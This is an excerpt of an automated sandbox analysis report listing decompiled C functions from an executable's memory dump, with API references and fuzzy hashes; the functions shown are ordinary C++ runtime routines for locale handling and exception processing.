                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                        • API String ID: 577375395-3145022300
                                                                                                                                                                                                        • Opcode ID: 1b99d0ce64b05c955f2e9c456a5a04959443f10303b7cd1ac7d5899b51e4269a
                                                                                                                                                                                                        • Instruction ID: e7e892875609e00dc102675d8b059eefcd2a707b8f49696479be40925adc9a57
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b99d0ce64b05c955f2e9c456a5a04959443f10303b7cd1ac7d5899b51e4269a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A018E31A002189BCB05FBA1C812AEE7B38AF44725F50453EF9217B1D1DF7C9A459B9D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E004037AA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t29 = __ebx;
                                                                                                                                                                                                        				_push(0x14);
                                                                                                                                                                                                        				E00406CE9(E00417316, __ebx, __edi, __esi);
                                                                                                                                                                                                        				E00403BDD(_t44 - 0x14, 0);
                                                                                                                                                                                                        				_t43 =  *0x42a408; // 0x20310d8
                                                                                                                                                                                                        				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
                                                                                                                                                                                                        				_t17 = E0041E070("tionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>");
                                                                                                                                                                                                        				_t32 =  *((intOrPtr*)(_t44 + 8));
                                                                                                                                                                                                        				_t18 = E0041E0E0( *((intOrPtr*)(_t44 + 8)), _t17);
                                                                                                                                                                                                        				_t41 = _t18;
                                                                                                                                                                                                        				if(_t18 == 0) {
                                                                                                                                                                                                        					if(_t43 == 0) {
                                                                                                                                                                                                        						_push( *((intOrPtr*)(_t44 + 8)));
                                                                                                                                                                                                        						_push(_t44 - 0x10);
                                                                                                                                                                                                        						_t23 = E004033AB(__ebx, _t32, _t41, _t43, __eflags);
                                                                                                                                                                                                        						__eflags = _t23 - 0xffffffff;
                                                                                                                                                                                                        						if(_t23 == 0xffffffff) {
                                                                                                                                                                                                        							E00405099(_t44 - 0x20, "bad cast");
                                                                                                                                                                                                        							E00404EFB(_t44 - 0x20, 0x424900);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                                                                                                                                        						 *0x42a408 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                                                                                                                                        						E0041D490( *((intOrPtr*)(_t44 - 0x10)));
                                                                                                                                                                                                        						E00403EA2(_t29, _t39, _t41, _t41);
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = _t43;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                                                                                                                                                        				E00403C05(_t44 - 0x14);
                                                                                                                                                                                                        				return E00406D88(_t41);
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x00403827
                                                                                                                                                                                                        0x0040382d
                                                                                                                                                                                                        0x004037ea
                                                                                                                                                                                                        0x004037ea
                                                                                                                                                                                                        0x004037ea
                                                                                                                                                                                                        0x004037e8
                                                                                                                                                                                                        0x00403833
                                                                                                                                                                                                        0x0040383a
                                                                                                                                                                                                        0x00403846

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 004037B1
                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004037BB
                                                                                                                                                                                                        • int.LIBCPMTD ref: 004037D2
                                                                                                                                                                                                          • Part of subcall function 0041E070: std::_Lockit::_Lockit.LIBCPMT ref: 0041E086
                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 004037DB
                                                                                                                                                                                                        • ctype.LIBCPMT ref: 004037F5
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00403809
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00403817
                                                                                                                                                                                                        • std::locale::facet::_Incref.LIBCPMTD ref: 00403827
                                                                                                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0040382D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                        • API String ID: 2535038987-3145022300
                                                                                                                                                                                                        • Opcode ID: 2f379a3135379599bececbbe14fc956e1e7577e9d51a0fe4c8d91f79dca6e05d
                                                                                                                                                                                                        • Instruction ID: 8d811c5e464190f9aeb22aac56cf9dcb062bf5623305d593723e8a90ca7da102
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f379a3135379599bececbbe14fc956e1e7577e9d51a0fe4c8d91f79dca6e05d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30018275A0021897CB04FBA1D8426EE7638AF84725F50452EF811772D1CF7C9A41D799
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041FAB0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _t27;
                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00403BDD( &_v16, 0);
                                                                                                                                                                                                        				_t27 =  *0x42a3f8; // 0x0
                                                                                                                                                                                                        				_v20 = _t27;
                                                                                                                                                                                                        				_v12 = E0041E070(0x42a400);
                                                                                                                                                                                                        				_v8 = E0041E0E0(_a4, _v12);
                                                                                                                                                                                                        				if(_v8 == 0) {
                                                                                                                                                                                                        					if(_v20 == 0) {
                                                                                                                                                                                                        						if(E0041FB80(__ebx, _t51, __edi,  &_v20, _a4) != 0xffffffff) {
                                                                                                                                                                                                        							_v8 = _v20;
                                                                                                                                                                                                        							 *0x42a3f8 = _v20;
                                                                                                                                                                                                        							_v24 = _v20;
                                                                                                                                                                                                        							E0041D490(_v24);
                                                                                                                                                                                                        							E0041E0C0(_v24);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							E00405099( &_v36, "bad cast");
                                                                                                                                                                                                        							E00404EFB( &_v36, 0x424900);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_v8 = _v20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_v40 = _v8;
                                                                                                                                                                                                        				E00403C05( &_v16);
                                                                                                                                                                                                        				return _v40;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0041FABB
                                                                                                                                                                                                        • int.LIBCPMTD ref: 0041FACD
                                                                                                                                                                                                          • Part of subcall function 0041E070: std::_Lockit::_Lockit.LIBCPMT ref: 0041E086
                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0041FADC
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                                                                                                                                                                        • String ID: bad cast$oA
                                                                                                                                                                                                        • API String ID: 3702371321-509890539
                                                                                                                                                                                                        • Opcode ID: b92cb2168fb3446b85d832f927bc3fb1ce10e8a3794336824a81f52de582357c
                                                                                                                                                                                                        • Instruction ID: d0c8af13bd39b524b62c7db2545636355969af438c318e7b6533179ef788dd55
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b92cb2168fb3446b85d832f927bc3fb1ce10e8a3794336824a81f52de582357c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B218474E04218DBCB04EFA5D851AEEB7B0FF48304F20456EE815B7291DB786E85CB99
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041DFB0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _t27;
                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00403BDD( &_v16, 0);
                                                                                                                                                                                                        				_t27 =  *0x42a3f4; // 0x0
                                                                                                                                                                                                        				_v20 = _t27;
                                                                                                                                                                                                        				_v12 = E0041E070(0x42a3fc);
                                                                                                                                                                                                        				_v8 = E0041E0E0(_a4, _v12);
                                                                                                                                                                                                        				if(_v8 == 0) {
                                                                                                                                                                                                        					if(_v20 == 0) {
                                                                                                                                                                                                        						if(E0041E1A0(__ebx, _t51, __edi,  &_v20, _a4) != 0xffffffff) {
                                                                                                                                                                                                        							_v8 = _v20;
                                                                                                                                                                                                        							 *0x42a3f4 = _v20;
                                                                                                                                                                                                        							_v24 = _v20;
                                                                                                                                                                                                        							E0041D490(_v24);
                                                                                                                                                                                                        							E0041E0C0(_v24);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							E00405099( &_v36, "bad cast");
                                                                                                                                                                                                        							E00404EFB( &_v36, 0x424900);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_v8 = _v20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_v40 = _v8;
                                                                                                                                                                                                        				E00403C05( &_v16);
                                                                                                                                                                                                        				return _v40;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0041DFBB
                                                                                                                                                                                                        • int.LIBCPMTD ref: 0041DFCD
                                                                                                                                                                                                          • Part of subcall function 0041E070: std::_Lockit::_Lockit.LIBCPMT ref: 0041E086
                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0041DFDC
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                                                                                                                                                                        • String ID: bad cast
                                                                                                                                                                                                        • API String ID: 3702371321-3145022300
                                                                                                                                                                                                        • Opcode ID: 0a9efcb7157f00852eec1acc81a28a4754c2fb49d9e04a770c3060e3bc60227d
                                                                                                                                                                                                        • Instruction ID: 107bd17a98ac46b6add300a843c84dd22db423041bf38a5926e6d7d72c70b845
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a9efcb7157f00852eec1acc81a28a4754c2fb49d9e04a770c3060e3bc60227d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 382142B4E00119DBCB04DFA5D851AEEB7B4FF48304F10456EE815B7291DB785E80CB99
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 40%
                                                                                                                                                                                                        			E0041FE40(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                        				signed char** _v24;
                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v72;
                                                                                                                                                                                                        				char _v80;
                                                                                                                                                                                                        				char _v88;
                                                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				char _t71;
                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                        				void* _t116;
                                                                                                                                                                                                        				intOrPtr _t120;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(0xffffffff);
                                                                                                                                                                                                        				_push(E00420180);
                                                                                                                                                                                                        				_push( *[fs:0x0]);
                                                                                                                                                                                                        				 *[fs:0x0] = _t120;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(_t78);
                                                                                                                                                                                                        				_push(_t116);
                                                                                                                                                                                                        				_v20 = _t120 - 0x48;
                                                                                                                                                                                                        				_v92 = __ecx;
                                                                                                                                                                                                        				_v24 = E00420000(_a4);
                                                                                                                                                                                                        				 *((intOrPtr*)(_v92 + 8)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_v92 + 0x10)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_v92 + 0x14)) = 0;
                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                        				_push(E0041FE10(_a4, _v92,  &_v32));
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				 *((intOrPtr*)(_v92 + 8)) = E00420030(_t78, _v24[2], _t116, __eflags, _v24[2]);
                                                                                                                                                                                                        				_push(E0041FE10(_a4,  &_v40,  &_v40));
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				 *((intOrPtr*)(_v92 + 0x10)) = E00420030(_t78,  &_v40, _t116, __eflags, E00420010(_a4));
                                                                                                                                                                                                        				_push(E0041FE10(_a4,  &_v48,  &_v48));
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				 *((intOrPtr*)(_v92 + 0x14)) = E00420030(_t78,  &_v48, _t116, __eflags, E00420020(_a4));
                                                                                                                                                                                                        				_v8 = 0xffffffff;
                                                                                                                                                                                                        				_push(E0041FE10(_a4,  &_v56,  &_v56));
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				 *((char*)(_v92 + 0xc)) = E0041FB70( *( *_v24) & 0x000000ff);
                                                                                                                                                                                                        				_push(E0041FE10(_a4,  &_v64,  &_v64));
                                                                                                                                                                                                        				_push(0);
                                                                                                                                                                                                        				_t71 = E0041FB70( *(_v24[1]) & 0x000000ff);
                                                                                                                                                                                                        				 *((char*)(_v92 + 0xd)) = _t71;
                                                                                                                                                                                                        				_t113 = _a8 & 0x000000ff;
                                                                                                                                                                                                        				_t131 = _a8 & 0x000000ff;
                                                                                                                                                                                                        				if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                                                                        					_push(E0041FE10(_a4, _t113,  &_v72));
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *((intOrPtr*)(_v92 + 8)) = E00420030(_t78, _t113, _t116, _t131, 0x4219c0);
                                                                                                                                                                                                        					_push(E0041FE10(_a4,  &_v80,  &_v80));
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *((char*)(_v92 + 0xc)) = E0041FB70(0x2e);
                                                                                                                                                                                                        					_push(E0041FE10(_a4,  &_v88,  &_v88));
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t71 = E0041FB70(0x2c);
                                                                                                                                                                                                        					 *((char*)(_v92 + 0xd)) = _t71;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *[fs:0x0] = _v16;
                                                                                                                                                                                                        				return _t71;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00420000: _localeconv.LIBCMT ref: 00420007
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FE9C
                                                                                                                                                                                                          • Part of subcall function 00420030: _strlen.LIBCMT ref: 0042003A
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FEC0
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FEE6
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FF33
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FF59
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FF88
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FFAA
                                                                                                                                                                                                        • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0041FFC9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: GetcvtLocinfo::_std::_$_localeconv_strlen
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3869368768-0
                                                                                                                                                                                                        • Opcode ID: 74d9d860099ca41ca6b69cba45c40580c8fad3b86d53f1f8a4a7349583e89daf
                                                                                                                                                                                                        • Instruction ID: 4757c36e0059387177324bbf1eeb6407ba96520becbf9860092ef7226653732a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74d9d860099ca41ca6b69cba45c40580c8fad3b86d53f1f8a4a7349583e89daf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 755192B4A00244AFD704DF91D851FAEBB75AF84744F10812EF8095F393DB366A5ACB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E00407F01(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				intOrPtr _t48;
                                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t61 = __eflags;
                                                                                                                                                                                                        				_t53 = __edx;
                                                                                                                                                                                                        				_push(0x2c);
                                                                                                                                                                                                        				_push(0x424eb8);
                                                                                                                                                                                                        				E0040D294(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t48 = __ecx;
                                                                                                                                                                                                        				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                                                                                                                                        				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                                                                        				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                                                                                                                                        				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                                                                                                                                        				 *((intOrPtr*)(_t58 - 0x28)) = E00404BF1(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                                                                                                                                        				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040B6F6(__ecx, __edx, _t55, _t61) + 0x88));
                                                                                                                                                                                                        				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040B6F6(_t48, __edx, _t55, _t61) + 0x8c));
                                                                                                                                                                                                        				 *((intOrPtr*)(E0040B6F6(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
                                                                                                                                                                                                        				 *((intOrPtr*)(E0040B6F6(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                                                                                                                                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                                                                                                                                        				 *(_t58 - 4) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t58 - 0x1c)) = E00404C96(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                                                                                                                                        				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                                                                                                                                        				 *(_t58 - 4) = 0xfffffffe;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                                                                                                                                        				E00408027(_t48, _t53, _t55, _t57, _t61);
                                                                                                                                                                                                        				return E0040D2D9( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __CreateFrameInfo.LIBCMT ref: 00407F29
                                                                                                                                                                                                          • Part of subcall function 00404BF1: __getptd.LIBCMT ref: 00404BFF
                                                                                                                                                                                                          • Part of subcall function 00404BF1: __getptd.LIBCMT ref: 00404C0D
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00407F33
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __getptd_noexit.LIBCMT ref: 0040B6F9
                                                                                                                                                                                                          • Part of subcall function 0040B6F6: __amsg_exit.LIBCMT ref: 0040B706
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00407F41
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00407F4F
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00407F5A
                                                                                                                                                                                                        • _CallCatchBlock2.LIBCMT ref: 00407F80
                                                                                                                                                                                                          • Part of subcall function 00404C96: __CallSettingFrame@12.LIBCMT ref: 00404CE2
                                                                                                                                                                                                          • Part of subcall function 00408027: __getptd.LIBCMT ref: 00408036
                                                                                                                                                                                                          • Part of subcall function 00408027: __getptd.LIBCMT ref: 00408044
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1602911419-0
                                                                                                                                                                                                        • Opcode ID: a9082bb619f5eb60629cdccbdd922cf3ae0bc7183406115def16ba247c36ffe8
                                                                                                                                                                                                        • Instruction ID: d736c13cd206db020babe6c2f5234d6dacf7d5bbd998fa3e3baa6f8d386cec23
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9082bb619f5eb60629cdccbdd922cf3ae0bc7183406115def16ba247c36ffe8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B1129B1C00209DFDB00EFA5C545B9E77B0FF04318F10846EF814A7292EB3999059F59
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                                                        			E00410742(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				LONG* _t21;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                        				LONG* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t35 = __eflags;
                                                                                                                                                                                                        				_t29 = __edx;
                                                                                                                                                                                                        				_t25 = __ebx;
                                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                                        				_push(0x425248);
                                                                                                                                                                                                        				E0040D294(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t31 = E0040B6F6(__ebx, __edx, __edi, _t35);
                                                                                                                                                                                                        				_t15 =  *0x429528; // 0xfffffffe
                                                                                                                                                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                        					E0040D68E(_t25, 0xd);
                                                                                                                                                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                        					__eflags = _t33 -  *0x429d48; // 0x2031638
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 != 0) {
                                                                                                                                                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        							if(_t23 == 0) {
